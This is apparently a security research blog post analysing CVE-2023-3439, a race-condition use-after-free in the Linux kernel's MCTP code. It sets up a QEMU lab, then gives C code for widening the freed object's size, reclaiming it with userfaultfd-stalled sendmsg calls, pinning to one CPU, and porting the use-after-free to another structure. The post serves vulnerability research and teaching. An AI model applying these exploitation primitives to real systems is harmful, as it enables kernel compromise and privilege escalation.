Exploit with VS- Labs. CVE-2023-3439: Analyzing UAF Vulnerability in Linux MCTP 

In this blog post, we analyze the UAF vulnerability in the Linux mctp component and possible exploitation scenarios in detail. We show the steps needed to prepare the analysis environment and the target kernel. We also try to give readers a new perspective by touching on exploitation tricks such as UAF porting.

ENVIRONMENT  

  1. QEMU (We will use Ubuntu 22.04 as the host OS, but you can also use others.)  
  1. CVE-2023-3439 POC Code (https://www.openwall.com/lists/oss-security/2023/07/02/1/1)
  1. Vulnerable Linux Kernel (https://mirrors.edge.kernel.org/pub/linux/kernel/v5.x/linux-5.17.5.tar.gz)
  1. Suitable Filesystem for Initial ramdisk (initrd)  

BUG INTRODUCTION

CVE-2023-3439 is a Race Condition-based Use After Free (UAF) vulnerability in the Linux kernel mctp component.   

In vulnerable kernel versions, the mdev->addrs object is freed when the mctp_unregister function is triggered. However, this unregister routine can be driven through a pseudo-terminal in such a way that only mdev->addrs is freed, without the dev_put function being triggered. This causes a Use After Free on the object.

We need to note the mctp_route_remove_dev and mctp_neigh_remove_dev functions. These functions clear all entries referring to the mctp device. After this cleaning, communication with the device is no longer possible because these device entries are checked within the mctp-related syscall routines.  

Here, the basic flow should be as follows to trigger Use After Free.   

While one of the two threads, running simultaneously, is trying to communicate with the mctp device via sendto, the other thread needs to trigger the unregister function using a pseudo-terminal to free the mdev->addrs object. But here, as can be expected, a race condition will occur. The thread communicating with the mctp device must pass the necessary sanity check conditions before the entries referencing the device are cleared.  

Since the race window is tight, userfaultfd would be a suitable primitive to stabilize the exploit and win the race.  

As soon as the thread communicating with the mctp device encounters a fault in syscall flow, the necessary sanity checks are completed because the userfault buffer we send with sendto is copied within the mctp_sendmsg function after the device-related checks we mentioned above.  

After the userfault is triggered, we can start the mctp_unregister function by closing the master tty file descriptor, so that sanity checks are bypassed and mdev->addrs object is freed.  

Although we can win the race this way, the method only works once. After the sendto call it is no longer possible to communicate with the device, because of the checks mentioned previously: once the route entries are cleared, any further communication attempt fails.

We will touch on UAF size extending and possible paths in the exploitation section.   

Let’s look at the environment-related procedures first.  

SETTING UP  

As we mentioned in the environment section, we use Ubuntu 22.04 as the host OS, but neither Ubuntu nor version 22.04 is required. Any Linux environment where you can run QEMU will work.

First, download the target vulnerable Linux kernel version 5.17.5. Then, compile the kernel with the necessary build configurations.  

These build configurations are essential for several reasons. They provide file transportation between the QEMU initrd filesystem and the host and allow access to the required files for exploitation under directories like /dev within the filesystem.  

After enabling the build configurations, we will cover key details about the initrd filesystem. In BusyBox filesystems, network and mount settings are usually manual, so we need to set up the network connection (the exploit needs it) and mount the necessary directories ourselves. But for now, let’s continue with the build configurations.

You can enable them from the .config file or from the default config file under the /arch/x86/configs directory. Let us look at these build configs.

 

    CONFIG_NET_9P=y
    CONFIG_NET_9P_DEBUG=n
    CONFIG_9P_FS=y
    CONFIG_9P_FS_POSIX_ACL=y
    CONFIG_9P_FS_SECURITY=y
    CONFIG_NET_9P_VIRTIO=y
    CONFIG_VIRTIO_PCI=y
    CONFIG_VIRTIO_BLK=y
    CONFIG_VIRTIO_BLK_SCSI=y
    CONFIG_VIRTIO_NET=y
    CONFIG_VIRTIO_CONSOLE=y
    CONFIG_HW_RANDOM_VIRTIO=y
    CONFIG_DRM_VIRTIO_GPU=y
    CONFIG_VIRTIO_PCI_LEGACY=y
    CONFIG_VIRTIO_BALLOON=y
    CONFIG_VIRTIO_INPUT=y
    CONFIG_CRYPTO_DEV_VIRTIO=y
    CONFIG_BALLOON_COMPACTION=y
    CONFIG_PCI=y
    CONFIG_PCI_HOST_GENERIC=y
    CONFIG_GDB_SCRIPTS=y
    CONFIG_DEBUG_INFO=y
    CONFIG_DEBUG_INFO_REDUCED=n
    CONFIG_DEBUG_INFO_SPLIT=n
    CONFIG_DEBUG_FS=y
    CONFIG_DEBUG_INFO_DWARF4=y
    CONFIG_DEBUG_INFO_BTF=y
    CONFIG_FRAME_POINTER=y
    CONFIG_DEVTMPFS=y
    CONFIG_DEVTMPFS_MOUNT=y
    CONFIG_MPTCP=y
    CONFIG_INET_MPTCP_DIAG=y
    CONFIG_MPTCP_IPV6=y
    CONFIG_CONFIGFS_FS=y
    CONFIG_SECURITYFS=y
    CONFIG_CMDLINE_BOOL=y
    CONFIG_MCTP=y
    CONFIG_MCTP_SERIAL=y
    CONFIG_UNIX98_PTYS=y
    CONFIG_USERFAULTFD=y

The last four are very important for the exploit. They are required to add the MCTP device to the kernel, communicate with it, and use userfaultfd and the pseudo-terminal.

The other configs cover the environmental requirements we mentioned above. You can also compile a second kernel with KASAN to analyze the KASAN output of the bug. This is often the easiest way to find the cache in which the UAF occurs, which we will need in the exploitation part.

The next step is the filesystem.  

We need a filesystem to run the custom-built vulnerable kernel in QEMU. It is possible to use the popular pwnkernel environment for this. But some changes need to be made. As we mentioned before, some settings need to be made manually in BusyBox systems. For this, we will modify the init file in the filesystem. The init file is the file the kernel runs after the boot process is completed; it contains the necessary settings for userland.  

We need to add these lines to the init file: 

 

    test -x /usr/sbin/v86d && dev_exec="exec" || dev_exec="noexec"
    mount -t devtmpfs -o $dev_exec,nosuid,mode=0755 udev /dev
    mkdir /dev/pts
    mount -t devpts devpts /dev/pts
    ifconfig eth0 10.0.2.15 netmask 255.255.255.0
    ip r add default via 10.0.2.10 dev eth0

As you can see, these commands mount /dev and /dev/pts and bring up the network connection. With that, the last step of the setup procedure is complete.

We have completed preparing the kernel and environment parts. Now it’s time to test it. Let’s build and run the POC code on the KASAN kernel and analyze the output.  

    [ 153.719234] ==================================================================
    [ 153.720212] BUG: KASAN: use-after-free in mctp_local_output+0x1332/0x1b10
    [ 153.720589] Read of size 1 at addr ffff88800a77e898 by task poc/114
    ...
    [ 153.731162] The buggy address belongs to the object at ffff88800a77e898
    [ 153.731162] which belongs to the cache kmalloc-8 of size 8
    [ 153.731651] The buggy address is located 0 bytes inside of
    [ 153.731651] 8-byte region [ffff88800a77e898, ffff88800a77e8a0)
    ...
    [ 153.738379] =================================================================

We successfully triggered the bug and got the KASAN output. I’ve only shared some parts of the output to reduce confusion. The main point to pay attention to here is that the UAF object belongs to the kmalloc-8 cache. At first, someone who sees this output may think that the object will be difficult to reallocate and that the bug is practically useless. But the case here is different: it is possible to increase the UAF size up to kmalloc-256 by adding new addresses.

Now, let’s move on to the exploitation section and examine the UAF size extension and exploitation paths.  

EXPLOITATION

First, we need to examine the allocation code flow in the source code to understand whether the UAF size extension is possible or not. The mdev->addrs object is allocated under the mctp_rtm_newaddr function.  

As we can understand from the function name, this is an addressing function. A tmp_addrs is created as a middle value, then the content of the mdev->addrs object is copied to this tmp_addrs, then the tmp_addrs and mdev->addrs pointers are swapped, and the flow is completed.  

As can be seen in the code, kmalloc function does not take a static value for the allocation size; there is a dynamic allocation here. This means that if we can change the mdev->num_addrs parameter, we can also change the allocation size. Then, what exactly affects mdev->num_addrs?  

In fact, the main factor affecting the mdev->num_addrs is the mctp_rtm_newaddr function itself. The mctp_rtm_newaddr function increments the value of the mdev->num_addrs by one on each successful execution.  

So, if we want to increase the allocation size, we need to trigger the mctp_rtm_newaddr function continuously. What triggers the mctp_rtm_newaddr function?  

When we look at the cross references of the mctp_rtm_newaddr function to find the answer, we see only one result.  

This result means we must use the rtnetlink protocol to trigger the mctp_rtm_newaddr function. A rtnetlink message containing the RTM_NEWADDR type and the PF_MCTP (AF_MCTP) protocol will get us to our destination.  
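Before turning to the POC's own helpers, here is a minimal sketch of what such a message looks like on the wire. It is not taken from the POC: put_attr and build_mctp_newaddr are hypothetical helper names, the NLM_F_REQUEST | NLM_F_ACK flags are an assumption about what a typical netlink helper sets, and the AF_MCTP fallback value of 45 is the one from the kernel's socket header, used only when the libc headers do not define it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>

#ifndef AF_MCTP
#define AF_MCTP 45 /* fallback for older libc headers */
#endif

/* Hypothetical helper: append one attribute at the current end of the message. */
static void put_attr(struct nlmsghdr *nlh, unsigned short type,
                     const void *data, size_t len)
{
    struct rtattr *rta =
        (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));

    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

/* Hypothetical helper: build an RTM_NEWADDR request carrying one MCTP address.
 * buf must be zeroed, aligned for struct nlmsghdr, and at least 64 bytes.
 * Returns the total message length in bytes. */
static size_t build_mctp_newaddr(void *buf, int ifindex, uint8_t eid)
{
    struct nlmsghdr *nlh = buf;
    struct ifaddrmsg *ifa;

    nlh->nlmsg_len = NLMSG_LENGTH(sizeof(*ifa));
    nlh->nlmsg_type = RTM_NEWADDR;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; /* assumption, see above */

    ifa = NLMSG_DATA(nlh);
    ifa->ifa_family = AF_MCTP;
    ifa->ifa_index = ifindex;

    /* Both attributes carry the same one-byte address, as in the POC. */
    put_attr(nlh, IFA_ADDRESS, &eid, sizeof(eid));
    put_attr(nlh, IFA_LOCAL, &eid, sizeof(eid));
    return nlh->nlmsg_len;
}
```

The resulting buffer would then be written to a socket opened with socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE). Each one-byte attribute is padded to four bytes, which is why the message is larger than the sum of its fields.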

Let’s look at implementing the rtnetlink call in the POC code.  

 

    // till now, the route is prepared
    // we have to prepare some new address
    // well, netlink again then
    struct ifaddrmsg genaddr = {0};
    genaddr.ifa_family = AF_MCTP;
    genaddr.ifa_index = ifindex;
    netlink_init(&nlmsg, RTM_NEWADDR, 0, &genaddr, sizeof(struct ifaddrmsg));
    uint8_t ifa_address = 18;
    netlink_attr(&nlmsg, IFA_ADDRESS, &ifa_address, sizeof(uint8_t));
    uint8_t ifa_local = 18;
    netlink_attr(&nlmsg, IFA_LOCAL, &ifa_local, sizeof(uint8_t));
    netlink_send(&nlmsg, rtnetlink_socket);

Here is the code block in the POC that makes the rtnetlink call and triggers the mctp_rtm_newaddr function. But as we mentioned earlier, mctp_rtm_newaddr increments mdev->num_addrs by one on every successful execution. Because of that, we need to make the rtnetlink call more than once to grow the allocation beyond a single address. Let’s add a little for loop.

 

    // we have to prepare some new address
    // well, netlink again then
    int cache_size = 246; // 246 is the max value
    struct ifaddrmsg genaddr = {0};
    genaddr.ifa_family = AF_MCTP;
    genaddr.ifa_index = ifindex;
    // one-byte values, because each attribute carries sizeof(uint8_t) bytes
    uint8_t ifa_address = 0, ifa_local = 0;
    for (int i = 0; i < cache_size; i++) {
        netlink_init(&nlmsg, RTM_NEWADDR, 0, &genaddr, sizeof(struct ifaddrmsg));
        netlink_attr(&nlmsg, IFA_ADDRESS, &ifa_address, sizeof(uint8_t));
        ifa_address++;
        netlink_attr(&nlmsg, IFA_LOCAL, &ifa_local, sizeof(uint8_t));
        ifa_local++;
        netlink_send(&nlmsg, rtnetlink_socket);
    }

We can quickly increase the UAF size with a small for loop. However, we have another issue that we should pay attention to here: how much can we increase the allocation size?  

There is a limit to that. Inside mctp_rtm_newaddr, the mctp_address_ok function is executed and its return value is checked. This function verifies that the value of addr->s_addr is between 7 and 255. In the loop above, each call adds a new address value, so addr->s_addr grows together with mdev->num_addrs: when mdev->num_addrs increases, the value of addr->s_addr increases linearly.

That’s why we can trigger the mctp_rtm_newaddr function a maximum of 246 times.  

But this is enough to move the UAF object to the kmalloc-256 cache. We mainly do this because it is much more difficult to reallocate an object in the kmalloc-8 cache stably. Why do we see kmalloc-8 in the KASAN output obtained with the original POC code? The original POC creates the rtnetlink message only once, so mctp_rtm_newaddr is triggered only once. That means kmalloc allocates a one-byte space (mdev->num_addrs = 0 in the first execution), and this request is automatically rounded up to kmalloc-8.
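To make the size arithmetic concrete, here is a minimal sketch of how a request size maps to a general-purpose kmalloc cache. The size-class table is an assumption (the usual classes up to 256 bytes on an x86_64 kernel), and kmalloc_cache_for and addrs_cache are hypothetical helper names, not kernel functions. It also assumes, as described above, that the buffer holding n one-byte addresses was requested with a size of n bytes.

```c
#include <stddef.h>

/* Assumed general-purpose kmalloc size classes up to 256 bytes. */
static const size_t kmalloc_classes[] = {8, 16, 32, 64, 96, 128, 192, 256};

/* Returns the object size of the cache that would serve a request of
 * `size` bytes, or 0 if the size is 0 or larger than the table covers. */
static size_t kmalloc_cache_for(size_t size)
{
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);

    if (size == 0)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    return 0;
}

/* Cache in which mdev->addrs would live once it holds num_addrs
 * one-byte addresses (hypothetical helper for this post). */
static size_t addrs_cache(size_t num_addrs)
{
    return kmalloc_cache_for(num_addrs);
}
```

With a single address the sketch returns 8, matching the kmalloc-8 line in the KASAN output, and any count from 193 upward lands in the 256-byte class.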

Thus, the UAF size extension is completed. Now it’s time for reallocation.  

We will use sendmsg (ancillary data buffer) and userfaultfd for reallocation. We will copy the userfaultfd setup and fault handler functions that the POC code uses to win the race and adapt them for use with sendmsg. With that plan, we obtain a stable reallocation by stopping the execution at memcpy_from_msg under the netlink_sendmsg function. The game plan is to allocate a memory region with the MAP_PRIVATE and MAP_ANONYMOUS flags and register it with userfaultfd. Then we pass this region as iov_base to the sendmsg syscall and create a new thread that waits for page faults. When the sendmsg syscall tries to read the data we sent, in the memcpy_from_msg call mentioned above, the kernel execution path is suspended and the fault handler is triggered. Thus, the sendmsg syscall never returns, and our reallocation memory is not freed. That’s how we make a successful reallocation.

 Let’s look at the setup userfault and fault handler functions we will use for reallocation.  


    void setup_uffd_reallocation(void)
    {
        struct uffdio_api uffd_api;
        struct uffdio_register uffd_reg;

        pagesize = sysconf(_SC_PAGE_SIZE);
        printf("[?] Page Size (setup_uffd) = %d\n", pagesize);
        uffd2 = (int)syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
        if (uffd2 < 0)
        {
            perror("userfaultfd");
            exit(-1);
        }
        uffd_api.api = UFFD_API;
        uffd_api.features = 0;
        if (ioctl(uffd2, UFFDIO_API, &uffd_api) < 0)
        {
            perror("ioctl#1");
            exit(-1);
        }
        uffd_addr2 = mmap(NULL, pagesize, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (uffd_addr2 == MAP_FAILED)
        {
            perror("mmap");
            exit(-1);
        }
        uffd_reg.range.start = (unsigned long long)uffd_addr2;
        uffd_reg.range.len = pagesize;
        uffd_reg.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd2, UFFDIO_REGISTER, &uffd_reg) < 0)
        {
            perror("ioctl#2");
            exit(-1);
        }
        /* Create a thread that will process the userfaultfd events */
        pthread_t thr;
        int s;
        s = pthread_create(&thr, NULL, reallocation_fault_handler, NULL);
        if (s != 0)
        {
            errno = s;
            errExit("pthread_create");
        }
        printf("[+] userfaultfd2 is done\n");
    }

With the setup_uffd_reallocation function above, we allocate the memory and register it with userfaultfd. Then we create a thread that runs the reallocation_fault_handler function, which waits for page faults in an infinite loop. Let’s also take a look at the reallocation_fault_handler function.

 
    void *reallocation_fault_handler(void *arg)
    {
        static struct uffd_msg msg; /* Data read from userfaultfd */
        ssize_t nread;

        (void)arg; /* unused; required by the pthread start routine signature */
        for (;;)
        {
            struct pollfd pollfd;
            int nready;

            pollfd.fd = uffd2;
            pollfd.events = POLLIN;
            nready = poll(&pollfd, 1, -1);
            if (nready == -1)
                errExit("poll");
            nread = read(uffd2, &msg, sizeof(msg));
            if (nread <= 0)
                errExit("read");
            if (msg.arg.pagefault.flags & UFFD_PAGEFAULT_FLAG_WRITE)
            {
                // in fact we do not expect
                errExit("WUT.. a write fault...?");
            }
            else
            {
                printf("[+] read fault trigger in sendmsg syscall\n");
                // Never resolve the fault: the faulting sendmsg stays blocked
                // in the kernel, which keeps the reallocated buffer alive
                while (1){}
            }
        }
        return NULL;
    }

Our main purpose in the reallocation_fault_handler function is to wait for page faults. In the reallocation case we take no action after receiving the fault: we deliberately leave it unresolved so that the faulting sendmsg call stays blocked and the reallocation memory is not freed. The other fault handler in the POC code, the one for the mctp device, behaves differently. When it receives a fault, we know that the sanity checks in the mctp_sendmsg path have already been passed, so it triggers the function that closes the master pseudo-terminal file descriptor (unerg_thread), freeing the mdev->addrs object. In other words, a userfaultfd handler can be adapted to different purposes and scenarios.

We examined the userfaultfd setup and handler function needed in the reallocation process. Now let’s look at the init_reallocation and reallocation functions that will trigger the sendmsg call that performs the reallocation.  

 

    //global variables
    int sender_socket;
    static char realloc_buffer[256] = {0};

    int init_reallocation(void) {
        struct cmsghdr *filler;

        sender_socket = _socket(AF_NETLINK, SOCK_DGRAM, 0);
        memset(realloc_buffer + 8, 'A', sizeof(realloc_buffer) - 8);
        filler = (struct cmsghdr *) realloc_buffer;
        filler->cmsg_len = sizeof(realloc_buffer);
        //filler->cmsg_level = 0; // must be different than SOL_SOCKET (1) to skip check
        return 0;
    }

As you know, the most critical factor in the reallocation process is speed. In other words, we must allocate the freed memory before another allocation claims it. For this reason, we do the preparation in the init_reallocation function before the sendmsg call to speed up the reallocation process. First, we open an AF_NETLINK socket and assign it to sender_socket, which is a global variable. We have another global variable here: realloc_buffer. This is the ancillary data buffer we mentioned earlier.

The content of this buffer, which we will send with the sendmsg call, will be copied to the memory to be allocated. In other words, this buffer will replace the mdev->addrs object, and the data we write into it will be used in every flow that uses mdev->addrs. That’s the main logic behind a successful reallocation. But there is another detail we should mention here: filler->cmsg_len. An ancillary data buffer is a sequence of cmsghdr structures with appended data. Because of that, these cmsghdr structures are validated while the ancillary data buffer is processed. To pass these checks, filler->cmsg_len must be equal to the buffer size (256 in this case, because the mdev->addrs object belongs to kmalloc-256), and filler->cmsg_level must be different from 1.

This means that after reallocation, the first 8 bytes of our mdev->addrs object will have to be equal to 256. Otherwise, we cannot use the ancillary data buffer primitive. But we can arbitrarily write in the remaining 248 bytes (of course, we should also pay attention to filler->cmsg_level).  
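The constraint can be sketched as a small user-space helper that prepares such a buffer and verifies both conditions before it is ever sent. prepare_spray and SPRAY_SIZE are hypothetical names for this post, and the layout assumption is a 64-bit glibc system, where cmsg_len is an 8-byte size_t at offset 0 of struct cmsghdr.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>

#define SPRAY_SIZE 256 /* target cache discussed above: kmalloc-256 */

/* Hypothetical helper: fill buf with `fill`, then overwrite only the
 * cmsg_len field so that a single header claims the whole buffer.
 * Returns 0 on success, -1 if the buffer is too small or the resulting
 * cmsg_level would be SOL_SOCKET (1), the value the text says to avoid. */
static int prepare_spray(unsigned char *buf, size_t len, unsigned char fill)
{
    struct cmsghdr hdr;

    if (len < sizeof(hdr))
        return -1;

    memset(buf, fill, len);

    /* Patch cmsg_len in place; every other byte keeps the fill value. */
    memcpy(&hdr, buf, sizeof(hdr));
    hdr.cmsg_len = len;
    memcpy(buf, &hdr, sizeof(hdr));

    if (hdr.cmsg_level == SOL_SOCKET)
        return -1;
    return 0;
}
```

Working on a copy of the header and writing it back with memcpy avoids casting the byte buffer to a struct pointer, but the effect is the same as in init_reallocation: only the length field is fixed, and the rest of the buffer stays attacker-chosen.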

That’s all for init_reallocation. Let’s continue with the reallocation function.  


    void *reallocation(void *arg) {
        struct msghdr mhdr;
        // initialize msghdr
        struct iovec iov = {.iov_base = uffd_addr2, .iov_len = 0x10};

        (void)arg; // unused; required by the pthread start routine signature
        memset(&mhdr, 0, sizeof(mhdr));
        mhdr.msg_iov = &iov;
        mhdr.msg_iovlen = 1;
        mhdr.msg_control = (void *) realloc_buffer; // use the ancillary data buffer
        mhdr.msg_controllen = sizeof(realloc_buffer);
        _sendmsg(sender_socket, &mhdr, 0); // blocks on the userfaultfd page
        return NULL;
    }

We prepared the message header structure (msghdr) that we will send with the sendmsg syscall within the reallocation function. In this structure, there is both the userfault memory (iov_base) that will cause execution to stop and the reallocation buffer (msg_control) that will replace the mdev->addrs object.  

The realloc_buffer we pass in the msg_control field is copied to ctl_buf (the ancillary data buffer) with the copy_from_user function under ____sys_sendmsg. This completes the reallocation. Then the memcpy_from_msg function under netlink_sendmsg tries to copy data from uffd_addr2 (the userfaultfd buffer) that we passed as iov_base. This triggers the userfault and blocks the syscall inside the kernel, so the reallocated buffer stays in place.

But where exactly do we need to trigger these functions in the POC code?  

We use four functions in the reallocation process: setup_uffd_reallocation, reallocation_fault_handler, init_reallocation, and reallocation. Except for the reallocation function, the others are designed to set up requirements before the exploit is triggered.   

So, we can trigger the other three functions inside the main function before triggering the exploit, but we should remember that reallocation_fault_handler is a function triggered by setup_uffd_reallocation. This means we need to trigger setup_uffd_reallocation and init_reallocation before triggering the exploit in the main function.   

But where exactly do we need to deploy the reallocation function in the POC code?  

We know the reallocation should happen right after the mdev->addrs object is freed. We mentioned at the beginning of the blog that the mctp_unregister function, which frees this object, is triggered after the userfault is triggered. The handler of the userfaultfd setup for the mctp device in the POC code is fault_handler_thread, so this is the function that frees the mdev->addrs object. Let’s look at what the handler does after the read fault is triggered.


    else
    {
        printf("[+] read fault trigger\n");
        // this is what we expect
        // sad thing: this close cannot easily return because the
        // unreg will keep waiting for the cleanup of all the netdev refs
        // hence we need a thread to do it
        pthread_t thr;
        pthread_create(&thr, NULL, unerg_thread, NULL);
        // sleep to let another thread free the addr
        sleep(4);
        *(unsigned long int *)page = 0;
        fault_cnt++;
        uffdio_copy.src = (unsigned long)page;
        uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address &

The fault_handler_thread function closes the master file descriptor and frees the mdev->addrs object immediately after the userfault is triggered. This is where we should deploy and trigger the reallocation function. After the unerg_thread function closes the master file descriptor, we should immediately call the reallocation function with a different thread. As a result, we have successfully implemented the reallocation flow into the POC code.  

Let’s modify the read fault handler block to implement reallocation.  

 

     else
     {
         printf("[+] read fault trigger\n");
         // this is what we expect
         // sad thing: this close cannot easily return because the
         // unreg will keep waiting for the cleanup of all the netdev refs
         // hence we need a thread to do it
    +    printf("Start Unreg Thread!\n");
    +    pthread_t thr, thr2;
         pthread_create(&thr, NULL, unerg_thread, NULL); //that thread will free the mdev->addrs
    +    printf("Unreg Thread Done!\n");
    +    sleep(1);
    +    printf("Start Reallocation!\n");
    +    pthread_create(&thr2, NULL, reallocation, NULL);// that thread will make reallocation
    +    printf("Reallocation Done!\n");
         // sleep to let another thread free the addr
         sleep(4);

You can see the read fault handler block I modified above. I put “+” at the beginning of the parts I added later to make it easier to understand. In addition, I took only the necessary parts from the code to avoid confusion.  

After this modification, the reallocation part is finished successfully. However, we need to mention a small detail. As you can see, we called the reallocation function not directly but by creating a new thread. We talked about the main reason for this before. We prepared a second userfault setup to keep the reallocation stable. In other words, the reallocation function is not a function that can return. The thread it is in will be stopped until the exploitation is finished. Because of this, we did not want the main exploit code to be stopped, so we called the reallocation function by creating a new thread.  

Now, it’s time to examine possible exploitation paths. But there is another detail that I want to mention first, which may be important for reallocation: sched_setaffinity.

sched_setaffinity is a system call in Linux that allows you to set the CPU affinity of a process or thread. CPU affinity refers to the assignment of a process or thread to run on a specific CPU core or a set of CPU cores within a multi-core system.  

In multi-core systems, memory allocators can maintain CPU-specific caches. As a result, memory freed on a specific CPU core is most likely to be handed out again to an allocation made on that same core. This means that if the free and the reallocation run on different CPU cores, the reallocation may fail.

For this reason, we can use sched_setaffinity to make reallocation more stable and reliable. When the exploit starts, we can try to set the CPU affinity of the exploit process to run exclusively on CPU core 0 (0 here is an arbitrary value; optionally, a different core can be selected). This way, we get a more stable and reliable reallocation.  

To do this, we will add a custom function called set_cpu_core to the POC code. Let’s take a look at this function.  


    int set_cpu_core(void)
    {
        cpu_set_t setter;

        CPU_ZERO(&setter);
        CPU_SET(0, &setter);
        if (_sched_setaffinity(getpid(), sizeof(setter), &setter) == -1)
        {
            perror("sched_setaffinity");
            return -1;
        }
        return 0;
    }

With this function, we ensure that the exploit process runs specifically on CPU core 0. We prevent possible CPU core-related reallocation problems.  

But remember that reliable reallocation is a complex topic, and each target means a different problem.  

So, we successfully triggered the bug, upgraded the mdev->addrs object from kmalloc-8 to kmalloc-256, made all the necessary setups for reallocation, and completed the reallocation. Now we have a UAF on the mdev->addrs object whose contents we can write arbitrarily, and we can analyze possible exploitation paths.

To find possible exploitation paths, we first need to determine where and how the mdev->addrs object is used.   

There are multiple ways to do this. We chose to use CodeQL. After writing a small CodeQL query, we found that the mdev->addrs object is used in 8 different places in the Linux Kernel (see that query at the end of the blog).  

Here is the list of the places: 

  1. kfree(mdev->addrs); under mctp_unregister function  
  1. pos = memchr(mdev->addrs, addr->s_addr, mdev->num_addrs); under mctp_rtm_deladdr function  
  1. memmove(pos, pos + 1, mdev->num_addrs - 1 - (pos - mdev->addrs)); under mctp_rtm_deladdr function
  1. memchr(mdev->addrs, addr->s_addr, mdev->num_addrs) under mctp_rtm_newaddr function  
  1. memcpy(tmp_addrs, mdev->addrs, mdev->num_addrs); under mctp_rtm_newaddr function  
  1. swap(mdev->addrs, tmp_addrs); under mctp_rtm_newaddr function  
  1. rc = mctp_fill_addrinfo(skb, mdev, mdev->addrs[mcb->a_idx], RTM_NEWADDR, portid, seq, NLM_F_MULTI); under mctp_dump_dev_addrinfo function  
  1. saddr = rt->dev->addrs[0]; under mctp_local_output function  

Now, let’s review them and see how they use mdev->addrs.  

When we analyze kfree in Case 1, we see it is under the mctp_unregister function. If you remember the beginning of the blog, this is the function we used to create the UAF and free the mdev->addrs object. We triggered the mctp_unregister function by closing the master file descriptor. If we want to re-trigger kfree, we have to trigger the mctp_unregister function again, which does not help exploitation. So, Case 1 is useless for us.

When we move on to Case 2, we encounter a memchr function. In this function, mdev->addrs object is used as a memory area to be scanned. It is impossible to consider it useful as it has no direct effect on mdev->addrs.  

In Case 3, we encounter a memmove function. The mdev->addrs object is treated only as a memory region. A memory move is performed according to the offset between the pos value obtained in the previous case and the start of mdev->addrs. Nothing stands out, so let’s continue to Case 4.

In Case 4, we are faced with the memchr function again. But that’s just a little sanity check. It is not useful.  

In Case 5, we encounter a more critical function compared to others: memcpy.  

This memcpy function is under the mctp_rtm_newaddr function (we mentioned the mctp_rtm_newaddr function in UAF size extension section). The main task of the memcpy function is to copy the contents of the mdev->addrs object to the intermediate object tmp_addrs with a larger size when we add a new address. Although it is a critical function, after the content of the mdev->addrs object we wrote arbitrarily is copied to the tmp_addrs object, it is assigned to the mdev->addrs object again with the swap function that we will see in the next case. In other words, we are overwriting the mdev->addrs object, not a different object. So, this is not what we need. Let’s continue to Case 6.  

Case 6 has the swap function that we just mentioned. When we add a new address, the size of the mdev->addrs object must increase. Because of this, a temporary tmp_addrs object is created and the pointers are swapped after the content copying process we mentioned above. So this will not work either.  

Before we move on to Case 7, there is a critical and important detail about the mctp_rtm_newaddr function that we need to mention.  

Although Case 5 and Case 6 in the mctp_rtm_newaddr function seem useless, the mctp_rtm_newaddr function is an excellent candidate for UAF porting. Let’s explain the idea behind the UAF porting.  

As we mentioned before, we upgraded the UAF size from kmalloc-8 to kmalloc-256. While doing this, we added 246 new addresses (remember, we can only add a maximum of 246 to pass the mctp_address_ok verification) and used mctp_rtm_newaddr function 246 times. Each time a new address is added, the temporary object tmp_addrs is freed with kfree after the content copying and swapping processes. The freed tmp_addrs here is the old and smaller size mdev->addrs object. In other words, the tmp_addrs is an object that acts as an intermediate variable to transfer the mdev->addrs to a larger memory area when a new address is added, and free the old mdev->addrs left behind after this transfer. So, this means if we can somehow replace the tmp_addrs with a useful target structure, we can free that structure and port the UAF.  

As we saw above, the usage areas of the mdev->addrs object are very limited. There doesn’t seem to be any way to reach direct code execution, because the mdev->addrs object is just a pointer to an array of one-byte addresses. Because of that, it may be a logical decision to move the UAF to a structure that contains function pointers and other useful objects. Here’s a way to do this. First, add 245 addresses to upgrade the UAF size to kmalloc-256. We intentionally do not use the last one: after reallocation we need it to trigger the mctp_rtm_newaddr function one last time and port the UAF. Then, the reallocation should be done with a structure that contains objects that will be useful in the exploitation process. After this reallocation, the address stored in mdev->addrs is the same as the address of the useful target structure (this is what we expect from reallocation). At this point, if we add one more address, the content copy and the swap assign a new kmalloc-256 allocation to mdev->addrs, and the old memory of mdev->addrs (the useful target structure) ends up in tmp_addrs. This means that kfree(tmp_addrs); at the end of the mctp_rtm_newaddr function frees the useful target structure we used for reallocation.
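The copy, swap, and free sequence behind UAF porting can be illustrated with a toy user-space model. This is not kernel code: struct toy_mdev and toy_newaddr are hypothetical names, malloc and free stand in for kmalloc and kfree, and the model only mirrors the order of operations described above for mctp_rtm_newaddr.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Toy stand-in for the two device fields discussed in this post. */
struct toy_mdev {
    uint8_t *addrs;
    size_t num_addrs;
};

/* Adds one address the way the text describes: allocate a buffer that is
 * one byte larger, copy the old contents, swap the pointers, then free
 * the buffer that is left behind. Returns the numeric address of the
 * buffer that was freed (0 on allocation failure or if there was none). */
static uintptr_t toy_newaddr(struct toy_mdev *mdev, uint8_t eid)
{
    uint8_t *tmp = malloc(mdev->num_addrs + 1);
    uint8_t *old;
    uintptr_t freed;

    if (!tmp)
        return 0;
    if (mdev->num_addrs)
        memcpy(tmp, mdev->addrs, mdev->num_addrs);
    tmp[mdev->num_addrs] = eid;

    old = mdev->addrs;  /* swap: the old buffer ends up in the temporary */
    mdev->addrs = tmp;
    mdev->num_addrs++;

    freed = (uintptr_t)old;
    free(old);          /* the free hits whatever the old pointer referenced */
    return freed;
}
```

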